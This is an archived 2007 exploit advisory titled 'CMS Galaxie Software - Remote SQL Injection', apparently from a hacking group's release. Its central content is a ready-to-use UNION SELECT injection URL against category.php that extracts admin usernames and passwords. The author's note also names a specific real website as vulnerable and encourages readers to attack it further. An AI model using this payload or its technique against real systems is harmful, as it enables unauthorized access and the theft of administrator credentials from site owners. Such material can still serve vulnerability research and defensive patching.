Home / os / solaris

cmsgalaxie-sql.txt

Posted on 14 December 2007

############################################################################################### # ___ ___ _ # / _ / _ | | # __ _| | | | | | |_ __ ___ _ __ ___| |_ # / _` | | | | | | | '_ / __| | '_ / _ __| # | (_| | |_| | |_| | | | \__ \_| | | | __/ |_ # \__, |\___/ \___/|_| |_|___(_)_| |_|\___|\__| # __/ | # |___/ ############################################################################################### #Program Title ################################################################################ #CMS Galaxie Software - Remote SQL Injection # #Note ####################################################################################### #Alright, bible.org is vuln to the sql injection.. but weird as it may seem the login doesnt work.. its a possiblility you can inject ur own username and password with sql injection, or maybe they are using another table name for the login page. good luck and give me shouts =) # #Script Website ############################################################################## #http://www.galaxie.com # ###################################################################################### # #Spl0it ######################################################################################### #http://vicsite.com/[pathtowebapp]/category.php?scid=1&category_id=-99%20union%20all%20select%20null,concat(username,0x20,0x3a,0x20,userpass),0%20from%20admin/* # #vuln discovered by ############################################################################### #MurderSkillz # #shoutz: z3r0, fish, ScUzZ, clorox, SyNiCaL, pr0be, rezen, str0ke, #err0r, sick, trintitty, asdfhacks.com , a59, fury, <S>, communized and everyone else at g00ns.net ###############################################################################################

 

TOP